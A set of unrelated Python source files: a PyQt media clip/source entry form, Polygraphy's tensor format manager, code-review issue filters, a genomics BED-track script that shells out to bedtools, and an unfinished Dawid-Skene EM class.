self.tags_edit.setWidgetResizable(True)
self.tags_edit.setObjectName("tags_edit")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 290, 83))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.tags_edit.setWidget(self.scrollAreaWidgetContents)
self.tags_hlayout.addWidget(self.tags_edit)
self.verticalLayout.addLayout(self.tags_hlayout)
self.line_2 = QtWidgets.QFrame(self.name_description_frame)
self.line_2.setFrameShape(QtWidgets.QFrame.HLine)
self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_2.setObjectName("line_2")
self.verticalLayout.addWidget(self.line_2)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.choose_source_button = QtWidgets.QPushButton(self.name_description_frame)
self.choose_source_button.setEnabled(False)
self.choose_source_button.setMaximumSize(QtCore.QSize(100, 16777215))
self.choose_source_button.setObjectName("choose_source_button")
self.horizontalLayout.addWidget(self.choose_source_button)
self.choose_source_label = QtWidgets.QLabel(self.name_description_frame)
self.choose_source_label.setEnabled(False)
self.choose_source_label.setObjectName("choose_source_label")
self.horizontalLayout.addWidget(self.choose_source_label)
self.verticalLayout.addLayout(self.horizontalLayout)
self.verticalLayout_2.addWidget(self.name_description_frame)
self.save_new_hlayout = QtWidgets.QHBoxLayout()
self.save_new_hlayout.setObjectName("save_new_hlayout")
self.save_button = QtWidgets.QPushButton(Form)
self.save_button.setEnabled(False)
self.save_button.setFlat(False)
self.save_button.setObjectName("save_button")
self.save_new_hlayout.addWidget(self.save_button)
self.new_button = QtWidgets.QPushButton(Form)
self.new_button.setCheckable(False)
self.new_button.setChecked(False)
self.new_button.setAutoRepeat(False)
self.new_button.setAutoExclusive(False)
self.new_button.setObjectName("new_button")
self.save_new_hlayout.addWidget(self.new_button)
self.verticalLayout_2.addLayout(self.save_new_hlayout)
self.retranslateUi(Form)
self.type_box.setCurrentIndex(3)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.add_clip.setText(_translate("Form", "Add clip"))
self.file_or_url_edit.setPlaceholderText(_translate("Form", "File or url..."))
self.file_chooser.setText(_translate("Form", "Choose file"))
self.name_label.setText(_translate("Form", "Name"))
self.description_label.setText(_translate("Form", "Description"))
self.type_label.setText(_translate("Form", "Type"))
self.type_box.setItemText(0, _translate("Form", "Audio"))
self.type_box.setItemText(1, _translate("Form", "Image"))
self.type_box.setItemText(2, _translate("Form", "Video"))
self.type_box.setItemText(3, _translate("Form", "Other"))
self.tags_label.setText(_translate("Form", "Tags"))
self.choose_source_button.setText(_translate("Form", "Select source"))
self.choose_source_label.setText(_translate("Form", "No source selected"))
self.save_button.setText(_translate("Form", "Save"))
self.save_button.setShortcut(_translate("Form", "Ctrl+S"))
self.new_button.setText(_translate("Form", "New"))
def after_setup_ui(self) -> None:
super().after_setup_ui()
# replaces the `self.tags_edit` scroll area with an `QCustomObject.QTagEdit`
self.tags_edit.deleteLater()
self.tags_edit.hide()
self.tags_edit = QTagEdit()
# configures the tage edit
self.tags_edit.setEnabled(False)
self.tags_edit.enableTagSuggestions(True)
self.tags_edit.setTagSuggestions([tag.name for tag in self.database.Tag.get_all()])
self.tags_hlayout.addWidget(self.tags_edit)
self.choose_source_button.clicked.connect(self.on_select_source)
def on_text_changed(self, text: str) -> None:
if text.strip() == '':
is_value = False
else:
is_value = True
self.name_edit.setReadOnly(not is_value)
self.description_edit.setReadOnly(not is_value)
self.type_box.setEnabled(is_value)
self.tags_edit.setEnabled(is_value)
self.choose_source_button.setEnabled(is_value)
self.choose_source_label.setEnabled(is_value)
self.save_button.setEnabled(is_value)
def on_select_source(self) -> None:
"""Opens a new `source.ShowSource` window to select the clips source"""
# this is imported here, because it would cause a circular import if it's imported above
from .source import ShowSource
source = self.database.Source.get(ShowSource(QtWidgets.QDialog(self.window, QtCore.Qt.WindowSystemMenuHint)).select())
self._source_id = source.id
self.choose_source_label.setText(source.name)
def on_save(self) -> None:
if not self._source_id:
reply = QtWidgets.QMessageBox.question(self.window,
'No source is given', 'No source for the clip is given. Are you sure to proceed?',
buttons=QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
if reply == QtWidgets.QMessageBox.No:
return
type = Type.Clip.from_name(self.type_box.currentText().lower())
if not type:
return
id = self.database.Clip.add_clip(self.file_or_url_edit.text(), self._source_id, type.value, self.name_edit.text(), self.description_edit.toPlainText()).id
for tag in self.tags_edit.tags():
if tag in self._all_tags:
self.database.Item.add_item(id, self.database.Tag.get_by(name=tag).id)
else:
self.database.Item.add_item(id, self.database.Tag.add_tag(tag).id)
logger.debug(f'Added new tag - Name: {tag}')
logger.debug(f'Added new clip - file / url: "{self.file_or_url_edit.text()}", source id: "{self._source_id}", type: "{type.value}", '
f'name: "{self.name_edit.text()}", description: "{self.description_edit.toPlainText()}", tags: {", ".join(self.tags_edit.tags())}')
self.on_new()
def on_new(self) -> None:
self.file_or_url_edit.setText('')
self.name_edit.setText('')
self.on_text_changed('')
self.type_box.setCurrentIndex(3)
self.tags_edit.clear()
class AddSource(_Add):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(452, 400)
self.verticalLayout = QtWidgets.QVBoxLayout(Form)
self.verticalLayout.setObjectName("verticalLayout")
self.add_source_label = QtWidgets.QLabel(Form)
self.add_source_label.setAlignment(QtCore.Qt.AlignCenter)
self.add_source_label.setObjectName("add_source_label")
self.verticalLayout.addWidget(self.add_source_label)
self.frame = QtWidgets.QFrame(Form)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.frame)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.file_or_url_hlayout = QtWidgets.QHBoxLayout()
self.file_or_url_hlayout.setObjectName("file_or_url_hlayout")
self.file_or_url_edit = QtWidgets.QLineEdit(self.frame)
self.file_or_url_edit.setText("")
self.file_or_url_edit.setObjectName("file_or_url_edit")
self.file_or_url_hlayout.addWidget(self.file_or_url_edit)
self.file_chooser = QtWidgets.QPushButton(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.file_chooser.sizePolicy().hasHeightForWidth())
self.file_chooser.setSizePolicy(sizePolicy)
self.file_chooser.setSizeIncrement(QtCore.QSize(0, 0))
self.file_chooser.setObjectName("file_chooser")
self.file_or_url_hlayout.addWidget(self.file_chooser)
self.verticalLayout_2.addLayout(self.file_or_url_hlayout)
self.line_3 = QtWidgets.QFrame(self.frame)
self.line_3.setFrameShape(QtWidgets.QFrame.HLine)
self.line_3.setFrameShadow(QtWidgets.QFrame.Sunken)
self.line_3.setObjectName("line_3")
self.verticalLayout_2.addWidget(self.line_3)
self.type_hlayout = QtWidgets.QHBoxLayout()
self.type_hlayout.setObjectName("type_hlayout")
self.type_label = QtWidgets.QLabel(self.frame)
self.type_label.setMinimumSize(QtCore.QSize(70, 0))
self.type_label.setObjectName("type_label")
self.type_hlayout.addWidget(self.type_label)
self.type_box = QtWidgets.QComboBox(self.frame)
self.type_box.setEnabled(False)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.type_box.sizePolicy().hasHeightForWidth())
self.type_box.setSizePolicy(sizePolicy)
self.type_box.setObjectName("type_box")
self.type_box.addItem("")
self.type_box.addItem("")
self.type_box.addItem("")
self.type_box.addItem("")
self.type_hlayout.addWidget(self.type_box)
self.verticalLayout_2.addLayout(self.type_hlayout)
self.from_hlayout = QtWidgets.QHBoxLayout()
self.from_hlayout.setObjectName("from_hlayout")
self.name_label = QtWidgets.QLabel(self.frame)
self.name_label.setMinimumSize(QtCore.QSize(70, 0))
self.name_label.setObjectName("name_label")
self.from_hlayout.addWidget(self.name_label)
self.name_edit = QtWidgets.QLineEdit(self.frame)
self.name_edit.setReadOnly(True)
self.name_edit.setObjectName("name_edit")
self.from_hlayout.addWidget(self.name_edit)
self.season_label = QtWidgets.QLabel(self.frame)
self.season_label.setObjectName("season_label")
self.from_hlayout.addWidget(self.season_label)
self.season_edit = QtWidgets.QLineEdit(self.frame)
self.season_edit.setMaximumSize(QtCore.QSize(50, 16777215))
self.season_edit.setReadOnly(True)
self.season_edit.setObjectName("season_edit")
self.from_hlayout.addWidget(self.season_edit)
self.episode_label = QtWidgets.QLabel(self.frame)
self.episode_label.setObjectName("episode_label")
self.from_hlayout.addWidget(self.episode_label)
self.episode_edit = QtWidgets.QLineEdit(self.frame)
self.episode_edit.setMaximumSize(QtCore.QSize(50, 16777215))
self.episode_edit.setReadOnly(True)
self.episode_edit.setObjectName("episode_edit")
self.from_hlayout.addWidget(self.episode_edit)
self.verticalLayout_2.addLayout(self.from_hlayout)
self.description_hlayout = QtWidgets.QHBoxLayout()
self.description_hlayout.setObjectName("description_hlayout")
self.description_label = QtWidgets.QLabel(self.frame)
self.description_label.setMinimumSize(QtCore.QSize(70, 0))
self.description_label.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.description_label.setObjectName("description_label")
self.description_hlayout.addWidget(self.description_label)
self.description_edit = QtWidgets.QTextEdit(self.frame)
self.description_edit.setReadOnly(True)
self.description_edit.setObjectName("description_edit")
self.description_hlayout.addWidget(self.description_edit)
self.verticalLayout_2.addLayout(self.description_hlayout)
self.verticalLayout.addWidget(self.frame)
self.save_new_hlayout = QtWidgets.QHBoxLayout()
self.save_new_hlayout.setObjectName("save_new_hlayout")
self.save_button = QtWidgets.QPushButton(Form)
self.save_button.setEnabled(False)
self.save_button.setObjectName("save_button")
self.save_new_hlayout.addWidget(self.save_button)
self.new_button = QtWidgets.QPushButton(Form)
self.new_button.setObjectName("new_button")
self.save_new_hlayout.addWidget(self.new_button)
self.verticalLayout.addLayout(self.save_new_hlayout)
self.retranslateUi(Form)
self.type_box.setCurrentIndex(2)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.add_source_label.setText(_translate("Form", "Add source"))
self.file_or_url_edit.setPlaceholderText(_translate("Form", "File or url..."))
self.file_chooser.setText(_translate("Form", "Choose file"))
self.file_chooser.setShortcut(_translate("Form", "Ctrl+O"))
self.type_label.setText(_translate("Form", "Type"))
self.type_box.setItemText(0, _translate("Form", "Audio"))
self.type_box.setItemText(1, _translate("Form", "Movie"))
self.type_box.setItemText(2, _translate("Form", "Series"))
self.type_box.setItemText(3, _translate("Form", "Other"))
self.name_label.setText(_translate("Form", "From"))
self.season_label.setText(_translate("Form", "Season"))
self.episode_label.setText(_translate("Form", "Episode"))
self.description_label.setText(_translate("Form", "Description"))
self.save_button.setText(_translate("Form", "Save"))
self.save_button.setShortcut(_translate("Form", "Ctrl+S"))
self.new_button.setText(_translate("Form", "New"))
self.new_button.setShortcut(_translate("Form", "Ctrl+N"))
def after_setup_ui(self) -> None:
super().after_setup_ui()
self.type_box.currentIndexChanged.connect(self.on_type_changed)
def on_text_changed(self, text: str):
if text.strip() == '':
is_value = False
else:
is_value = True
self.name_edit.setReadOnly(not is_value)
self.season_edit.setReadOnly(not is_value)
self.episode_edit.setReadOnly(not is_value)
self.description_edit.setReadOnly(not is_value)
self.type_box.setEnabled(is_value)
self.save_button.setEnabled(is_value)
def on_type_changed(self, index: int) -> None:
"""Modifies the name / from, season and episode line edits, based on the `index`"""
if index in [0, 1, 3]: # audio / movie
# hides the season and episode label / line edit and sets the text of the name / from label to 'Name'
self.name_label.setText('Name')
self.season_label.hide()
self.season_edit.hide()
self.episode_label.hide()
self.episode_edit.hide()
elif index == 2: # series
# shows the season and episode label / line edit and sets the text of the name / from label to 'From'
self.name_label.setText('From')
self.season_label.show()
self.season_edit.show()
self.episode_label.show()
self.episode_edit.show()
def on_save(self) -> None:
type = Type.Source.from_name(self.type_box.currentText().lower())
if not type:
return
file_or_url = self.file_or_url_edit.text()
name = self.name_edit.text()
description = self.description_edit.toPlainText()
season = self.season_edit.text()
episode = self.episode_edit.text()
# it checks if some of the data is already in the database
if type == Type.Source.SERIES and self.database.Source.has(type=type.value, name=name, season=season, episode=episode):
has_same = True
elif type != Type.Source.SERIES and self.database.Source.has(name=name):
has_same = True
else:
has_same = False
if has_same:
# if some of the data were in the database it checks if the exact same data is in the database
if self.database.Source.has(path=file_or_url, type=type.value, name=name, description=description, season=season, episode=episode):
QtWidgets.QMessageBox.warning(self.window, 'The source already exist', 'A source with the exact same data (name, description, type, etc.) already exist')
return
elif type == Type.Source.SERIES:
proceed = QtWidgets.QMessageBox.question(self.window, 'The source may already exist', 'A source with some same data (name, season and episode at least) already exist. '
'Do you want to proceed?', QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No)
if not proceed:
return
self.database.Source.add_source(self.file_or_url_edit.text(), type.value, self.name_edit.text(), self.description_edit.toPlainText(), self.season_edit.text(), self.episode_edit.text())
logger.debug(f'Added new source - file / url: "{self.file_or_url_edit.text()}", name: "{self.name_edit.text()}", description: "{self.description_edit.toPlainText()}", '
f'season: "{self.season_edit.text()}", episode: "{self.episode_edit.text()}"')
self.on_new()
def on_new(self) -> None:
self.file_or_url_edit.setText('')
self.type_box.setCurrentIndex(2)
self.name_edit.setText('')
self.season_edit.setText('')
self.episode_edit.setText('')
self.description_edit.setText('')
|
#
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import enum
from polygraphy.logger import G_LOGGER
# TRT does not include batch dimension.
class DataFormat(enum.IntEnum):
UNKNOWN = 0
NW = 1
NHW = 2
CHW = 3
NHWC = 4
NCHW = 5
# This class is responsible for deducing the format of a shape,
# and converting it to the desired format (specified as a DataFormat).
class FormatManager(object):
# NOTE: New permutations should be added in this function, as it will automatically generate the inverses.
def _generate_permutations():
def is_invertible(perm):
return min(perm) >= 0 and max(perm) < len(perm)
def inverse_permutation(perm):
inverse = [perm[index] for index in perm]
return inverse
# Inverse permutations are generated automatically below.
# We use -1 to denote that a dummy dimension of 1 should be inserted in the convert function.
initial_permutations = {
(DataFormat.NCHW, DataFormat.NCHW): (0, 1, 2, 3),
(DataFormat.NHWC, DataFormat.NHWC): (0, 1, 2, 3),
(DataFormat.NHWC, DataFormat.NCHW): (0, 3, 1, 2),
(DataFormat.CHW, DataFormat.CHW): (0, 1, 2),
(DataFormat.NCHW, DataFormat.CHW): (1, 2, 3),
(DataFormat.NHWC, DataFormat.CHW): (3, 1, 2),
(DataFormat.NHW, DataFormat.CHW): (-1, 1, 2),
(DataFormat.NW, DataFormat.CHW): (-1, -1, 1),
}
permutations = {}
for (f1, f2), perm in initial_permutations.items():
permutations[(f1, f2)] = perm
if is_invertible(perm):
permutations[(f2, f1)] = inverse_permutation(perm)
return permutations
# Dict[Tuple[DataFormat, DataFormat], Tuple[int]]
# This provides the correct permutation for various data format conversions.
DATA_PERMUTATIONS = _generate_permutations()
@staticmethod
def determine_format(shape):
"""
Guesses the data format of a given shape.
Args:
shape (Tuple[int]): The shape, including batch dimension.
Returns:
DataFormat: The determined data format.
"""
# The smaller this ratio, the closer a and b are.
def minmax_ratio(a, b):
return abs(max(a, b) / min(a, b))
# Assume all shapes include batch dimension
if len(shape) == 4:
# Typically, H and W are quite close, so if minmax_ratio(0, 1) > minmax_ratio(1, 2), then we assume CHW.
if minmax_ratio(shape[1], shape[2]) > minmax_ratio(shape[2], shape[3]):
return DataFormat.NCHW
return DataFormat.NHWC
elif len(shape) == 3:
return DataFormat.NHW
elif len(shape) == 2:
return DataFormat.NW
else:
G_LOGGER.warning(
"Cannot determine format for "
+ str(shape)
+ ". Currently only implemented for input_buffers with 1-3 non-batch dimensions. Please update this function!"
)
return DataFormat.UNKNOWN
# Get the permutation required to transpose old_format to new_format
@staticmethod
def permutation(old_format, new_format):
return FormatManager.DATA_PERMUTATIONS[(old_format, new_format)]
@staticmethod
def convert(shape, new_format):
"""
Permutes a shape from one format to another.
Args:
shape (Tuple[int]): The shape to convert.
new_format (DataFormat): The desired format of the shape.
Returns:
Tuple[int]: A new shape in the correct format.
"""
old_format = FormatManager.determine_format(shape)
perm = FormatManager.permutation(old_format, new_format)
return [shape[index] if index != -1 else 1 for index in perm]
|
from collections import defaultdict
from typing import Dict, List, Tuple
from src.python.review.common.language import Language
from src.python.review.inspectors.issue import BaseIssue, IssueType, Measurable
from src.python.review.quality.rules.boolean_length_scoring import LANGUAGE_TO_BOOLEAN_EXPRESSION_RULE_CONFIG
from src.python.review.quality.rules.class_response_scoring import LANGUAGE_TO_RESPONSE_RULE_CONFIG
from src.python.review.quality.rules.coupling_scoring import LANGUAGE_TO_COUPLING_RULE_CONFIG
from src.python.review.quality.rules.cyclomatic_complexity_scoring import LANGUAGE_TO_CYCLOMATIC_COMPLEXITY_RULE_CONFIG
from src.python.review.quality.rules.function_length_scoring import LANGUAGE_TO_FUNCTION_LENGTH_RULE_CONFIG
from src.python.review.quality.rules.inheritance_depth_scoring import LANGUAGE_TO_INHERITANCE_DEPTH_RULE_CONFIG
from src.python.review.quality.rules.method_number_scoring import LANGUAGE_TO_METHOD_NUMBER_RULE_CONFIG
from src.python.review.quality.rules.weighted_methods_scoring import LANGUAGE_TO_WEIGHTED_METHODS_RULE_CONFIG
def __get_issue_type_to_low_measure_dict(language: Language) -> Dict[IssueType, int]:
return {
IssueType.CYCLOMATIC_COMPLEXITY: LANGUAGE_TO_CYCLOMATIC_COMPLEXITY_RULE_CONFIG[language].cc_value_moderate,
IssueType.FUNC_LEN: LANGUAGE_TO_FUNCTION_LENGTH_RULE_CONFIG[language].func_len_bad,
IssueType.BOOL_EXPR_LEN: LANGUAGE_TO_BOOLEAN_EXPRESSION_RULE_CONFIG[language].bool_expr_len_good,
IssueType.INHERITANCE_DEPTH: LANGUAGE_TO_INHERITANCE_DEPTH_RULE_CONFIG[language].depth_bad,
IssueType.METHOD_NUMBER: LANGUAGE_TO_METHOD_NUMBER_RULE_CONFIG[language].method_number_good,
IssueType.COUPLING: LANGUAGE_TO_COUPLING_RULE_CONFIG[language].coupling_moderate,
IssueType.CLASS_RESPONSE: LANGUAGE_TO_RESPONSE_RULE_CONFIG[language].response_good,
IssueType.WEIGHTED_METHOD: LANGUAGE_TO_WEIGHTED_METHODS_RULE_CONFIG[language].weighted_methods_good
}
def __more_than_low_measure(issue: BaseIssue, issue_type_to_low_measure_dict: Dict[IssueType, int]) -> bool:
issue_type = issue.type
if isinstance(issue, Measurable) and issue.measure() <= issue_type_to_low_measure_dict.get(issue_type, -1):
return False
return True
def filter_low_measure_issues(issues: List[BaseIssue],
language: Language) -> List[BaseIssue]:
issue_type_to_low_measure_dict = __get_issue_type_to_low_measure_dict(language)
# Disable this types of issue, requires further investigation.
ignored_issues = [IssueType.COHESION, IssueType.CHILDREN_NUMBER]
return list(filter(
lambda issue: issue.type not in ignored_issues and __more_than_low_measure(issue,
issue_type_to_low_measure_dict),
issues))
FilePath = str
LinesNumber = int
Inspector = str
GroupedIssues = Dict[FilePath, Dict[LinesNumber, Dict[Inspector, Dict[IssueType, List[BaseIssue]]]]]
def __init_grouped_issues() -> GroupedIssues:
return defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: []))))
def filter_duplicate_issues(issues: List[BaseIssue]) -> List[BaseIssue]:
"""
Skipping duplicate issues using heuristic rules:
For each line's number try to count issues with unique type for each unique inspector and select the best one.
The inspector with the biggest number of issues for each type will be chosen.
"""
grouped_issues = group_issues(issues)
selected_issues = []
for _, issues_in_file in grouped_issues.items():
for _, issues_in_line in issues_in_file.items():
# no conflicts -> take all issues found by a single inspector
if len(issues_in_line) == 1:
all_issues = [issue for types_by_inspector in issues_in_line.values()
for issues_by_type in types_by_inspector.values()
for issue in issues_by_type]
selected_issues.extend(all_issues)
# conflicts -> take issues found by a more informative inspector
elif len(issues_in_line) > 1:
default_inspector = 'UNKNOWN'
# By default for each <IssueType> we add the tuple (inspector: 'UNKNOWN', issue_type_freq: -1)
inspectors_by_types: Dict[IssueType, Tuple[Inspector, int]] = defaultdict(
lambda: (default_inspector, -1))
for inspector, issues_by_types in issues_in_line.items():
# Handle all possible issue types
for issue_type in IssueType:
issue_type_freq = len(issues_by_types.get(issue_type, []))
# This <issue_type> was not find by the <inspector>
if issue_type_freq == 0:
continue
max_issue_type_freq = inspectors_by_types[issue_type][1]
# Current inspector has more issues with type <issue_type> than previous ones
if issue_type_freq > max_issue_type_freq:
inspectors_by_types[issue_type] = (inspector, issue_type_freq)
for issue_type, inspector_to_freq in inspectors_by_types.items():
inspector = inspector_to_freq[0]
if inspector != default_inspector:
selected_issues.extend(issues_in_line[inspector][issue_type])
return selected_issues
def group_issues(issues: List[BaseIssue]) -> GroupedIssues:
"""
Group issues according to the following structure:
- FILE_PATH:
- LINES_NUMBER:
- INSPECTOR:
- ISSUE_TYPE:
[ISSUES]
We will consider each file to find potential duplicates:
if one line number in the file contains several same issues which were found by different inspectors,
we will try to find the best one. See <filter_duplicate_issues> function.
"""
grouped_issues: GroupedIssues = __init_grouped_issues()
for issue in issues:
file_path = str(issue.file_path)
line_no = issue.line_no
inspector_name = str(issue.inspector_type)
issue_type = issue.type
grouped_issues[file_path][line_no][inspector_name][issue_type].append(issue)
return grouped_issues
|
<filename>scripts/get_validated_rule_tracks.py<gh_stars>1-10
import os
import re
import sys
import glob
import json
import pandas as pd
import networkx as nx
def get_bed_from_nx_graph(
graph,
bed_file,
interval_key="active",
merge=True,
return_key="region"):
"""get BED file from nx examples
"""
if isinstance(graph.graph["examples"], basestring):
graph.graph["examples"] = graph.graph["examples"].split(",")
examples = list(graph.graph["examples"])
return_intervals = []
with open(bed_file, "w") as fp:
for region_metadata in examples:
interval_types = region_metadata.split(";")
interval_types = dict([
interval_type.split("=")[0:2]
for interval_type in interval_types])
interval_string = interval_types[interval_key]
return_intervals.append(interval_types[return_key])
chrom = interval_string.split(":")[0]
start = interval_string.split(":")[1].split("-")[0]
stop = interval_string.split("-")[1]
fp.write("{0}\t{1}\t{2}\n".format(chrom, start, stop))
if merge:
# merge
tmp_bed_file = "{}.tmp.bed".format(bed_file.split(".bed")[0])
os.system("mv {} {}".format(bed_file, tmp_bed_file))
os.system("cat {} | sort -k1,1 -k2,2n | bedtools merge -i stdin | bgzip > {}".format(
tmp_bed_file, bed_file))
os.system("rm {}".format(tmp_bed_file))
# renumber
tmp_bed_file = "{}.tmp.bed.gz".format(bed_file.split(".bed")[0])
os.system("mv {} {}".format(bed_file, tmp_bed_file))
#os.system("zcat {} | awk -F '\t' '{{ print $1\"\t\"$2\"\t\"$3\"\t\"$1\":\"$2\"-\"$3\"\t\"NR\"\t+\" }}' | bgzip -c > {}".format(
# tmp_bed_file, bed_file))
os.system("zcat {} | awk -F '\t' '{{ print $1\"\t\"$2\"\t\"$3\"\ttest\"NR\"\t\"NR\"\t.\" }}' | bgzip > {}".format(
tmp_bed_file, bed_file))
os.system("rm {}".format(tmp_bed_file))
# bgzip
#new_tmp_bed_file = "{}.bed".format(tmp_bed_file.split(".tmp")[0])
#os.system("mv {} {}".format(tmp_bed_file, new_tmp_bed_file))
#os.system("bgzip {}".format(new_tmp_bed_file))
#os.system("rm {}".format(tmp_bed_file))
return return_intervals
def _make_json_bed_entry(bed_file, display_name, dir_url):
"""add a bed file to json
"""
entry = {}
entry["type"] = "bed"
entry["url"] = "{}/{}".format(dir_url, bed_file)
entry["name"] = display_name
entry["mode"] = "full"
return entry
def main():
"""pull the region sets as bed files to visualize results
"""
# input files
mpra_file = sys.argv[1]
rule_dir = sys.argv[2]
dir_url = "http://mitra.stanford.edu/kundaje/dskim89/ggr/paper"
# for rule in rule dir, pull the BED file from it
rules = pd.read_csv(mpra_file, sep="\t")
rules = rules[~rules["interaction"].str.contains("FAILED")]
json_entries = []
for rule_idx in range(rules.shape[0]):
rule_name = rules["grammar"].iloc[rule_idx]
pwm1_name = rules["pwm1_clean"].iloc[rule_idx]
pwm2_name = rules["pwm2_clean"].iloc[rule_idx]
# get gml file
gml_file = "{}/{}.gml".format(rule_dir, rule_name)
graph = nx.read_gml(gml_file)
# make bed file
bed_file = "{}.{}_x_{}.bed.gz".format(rule_name, pwm1_name, pwm2_name)
if not os.path.isfile(bed_file):
print bed_file
get_bed_from_nx_graph(
graph,
bed_file,
interval_key="active",
merge=True,
return_key="region")
os.system("chmod a+x {}".format(bed_file))
display_name = bed_file.split(".")[-3]
json_entry = _make_json_bed_entry(bed_file, display_name, dir_url)
json_entries.append(json_entry)
# also make a tbi file
make_tbi = "tabix -p bed {}".format(bed_file)
tbi_file = "{}.tbi".format(bed_file)
if not os.path.isfile(tbi_file):
os.system(make_tbi)
# set up json file with appropriate names
json_file = "combinatorial_rules.json"
json_data = json.dumps(json_entries, indent=1)
json_data = re.sub(r'"(.*?)"(?=:)', r'\1', json_data)
with open(json_file, "w") as fp:
fp.write(json_data)
return
main()
|
<reponame>prijatelj/bayesian_eval_ground_truth-free
"""
All implemnetations of Dawid and Skene's EM algorithm, including the original,
hierarchial, and spectral.
"""
import math
import csv
import random
import sys
import numpy as np
from scipy.sparse import spmatrix # only necessary if the given sparse matrix need detected and handled carefully (ie. operations used do not exist for sparse matrices or would be inefficent.
class DawidSkene(object):
"""Original Dawid and Skene EM algorithm that estimates the true values of
the labels from the annotation data. This is intendend for classification
tasks only and would need modified to handle regression tasks
(confusion matrices, marginal probabilites, etc. would all become densities
and be changed in how they are applied).
Attributes
----------
annotations : array-like
The observed data (X in wikipedia).
The annotators' annotations.
unobserved_data : array-like NOTE THAT THIS DOES NOT EXIST IN DAWID & SKENE????
The unobserved data, missing values, or latent variables (Z in wikipedia).
? the bias, characteristics, etc of annotators?
The confusion matrices of every annotator.
confusion_matrices : array-like
The confusion matrices of every annotator. Indexed by the k annotators,
and then each matrix is a dense matrix of lxl where l is the possible
label values.
truth_inference_estimates: array-like
The parameter_estimates vector of estimates for the unknown paramters (Theta in wikipedia).
If given, then it serves as a prior.
The truth inference of the samples.
marginal_probabilities : array-like
The marginal probabilities of the values of the annotation labels.
likelihood_function : array-like
The likelihood function L(Theta; X, Z) = p(X,Z|Theta)
ground_truth : array-like, optional
In the case that the ground truth is provided, it can be used to ...
random_state : numpy.random.RandomState
The random_state of this model. This will not be used if prior
truth_inference_estimates are provided to model.
"""
def __init__(self, annotations, truth_inference_estimates=None, ground_truth=None, random_state=None):
"""Initializes the Dawid and Skene Expectation Maximization algorithm.
Parameters
----------
"""
self.reinit(annotations, truth_inference_estimates, ground_truth, random_state)
def reinit(self, annotations, truth_inference_estimates=None, ground_truth=None, random_state=None):
"""Reinitializes the Dawid and Skene Expectation Maximization algorithm
Parameters
----------
"""
# CHECKS:
# get number of annotators from observed data
#annotator_ids, annotator_annotations, indices = np.unique(annotations, return_counts=True, return_index=True)
#annotator_count = len(annotator_ids)
# get number of annoations from an annotator per sample to handle
# multi-labeling, also preserve order if possible.
#for i, annotator in enumerate(annotator_ids):
# TODO Initialize truth_inference_estimates.
# discrete/classification only is:
# np.empty(parameters_count, number_of_possible_label_values).fill(1/parameters_count)
# should be able to do continuous values for regression by statement on EM...
#self.truth_inference_estimates = if truth_inference_estimates is None else truth_inference_estimates
def fit(self, iterations, threshold=None):
"""Runs the EM algorithm for either a given number of iterations or
until a threshold is met.
Parameters
----------
iterations : int, optional
The explicit number of maximum iterations to perform. Will complete
exactly this many iterations if threshold is not set and is not met
prior to this maximum number of iterations.
threshold : float, optional
The threshold for the minimum amount of change in the estimated
parameters that is acceptable for the algorithm to terminate.
"""
iteration_count = 0
previous_truth_inference_estimates = self.truth_inference_estimates
parameter_difference = threshold + 1
while iteration_count < iterations and (threshold is None or parameter_difference > threshold):
self.expectation_step()
self.maximization_step()
iteration_count += 1
if threshold is not None:
parameter_difference = abs(previous_truth_inference_estimates)
def calculate_threshold(self):
"""In the case EM continues until a threshold of minimal change is met."""
# TODO, but probabl can be done in fit, itself by saving the prior truth_inference_estimates and comparing the difference to some threshold.
return
def expectation_step(self):
"""Update
Compute the probability of each possible value of the unobserved data given the parameter estimates
"""
# confusion matrix for every annotator: k_{j,l} = Sum_i(T_{i,j}n_{i,l})/Sum_i(Sum_j(T_{i,j}n_{i,l}))
# marginal probabilities
def maximization_step(self):
"""Compute better parameter estimates using the just computed unannotations
"""
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from __future__ import print_function
__author__ = 'seelviz'
from plotly.offline import download_plotlyjs
from plotly.graph_objs import *
from plotly import tools
import plotly
import os
#os.chdir('C:/Users/L/Documents/Homework/BME/Neuro Data I/Data/')
import csv,gc # garbage memory collection :)
import numpy as np
# import matplotlib.pyplot as plt
# from mpl_toolkits.mplot3d import axes3d
# from mpl_toolkits.mplot3d import axes3d
# from collections import namedtuple
import csv
import re
import matplotlib
import time
import seaborn as sns
